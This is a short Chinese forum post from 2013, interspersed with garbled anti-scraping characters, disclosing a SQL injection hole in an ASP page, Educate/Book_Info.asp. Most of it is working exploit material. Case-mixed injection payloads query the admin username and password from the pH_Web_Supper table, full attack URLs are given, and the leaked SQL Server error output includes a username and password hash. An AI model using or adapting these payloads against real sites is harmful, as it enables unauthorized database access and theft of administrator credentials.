漏洞出现在Educate/Book_Info.asp ; O V* v1 _3 m! D0 f# f/ {
+ N4 Q* F7 j. A4 D$ [
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出! o& l& @8 I! o9 W6 n
( ~5 g2 t' ?+ {* z& wexp:如下
: ~- |/ v$ O# v0 V ^6 p查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ L1 v! W* A) k; J
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 e/ U& |, q. j# [, B% C, p
! q$ n' x% o0 s7 Shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. ?9 }1 G* n; l+ V9 c& z
0 M( K: V5 s6 ?* _* vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'1 P4 ]6 P- A6 m" Z3 c, h
$ i' e+ j q8 x0 a
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
9 I6 Z5 `, q* p( f
3 \! n/ Q3 ?, |+ c( n1 {/Educate/Book_Info.asp,行 84 R% L" b0 S$ m) t$ W! t. N7 `2 B
5 s2 C: U& @, q- t& ^# phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ s, z0 | ~( K3 K; [ , y% j1 \# D+ a- |- H
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 I( i; Y" n9 y( E7 e @
7 y+ E' Y& g7 c将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。! j0 v" X5 ~! a# i: N! {2 ?$ q0 a4 S
0 _6 J% r( g# |- [3 }/Educate/Book_Info.asp,行 8
6 a" t2 B) o/ S" Q |
发表于 2013-2-16 21:44:16
收藏
支持
反对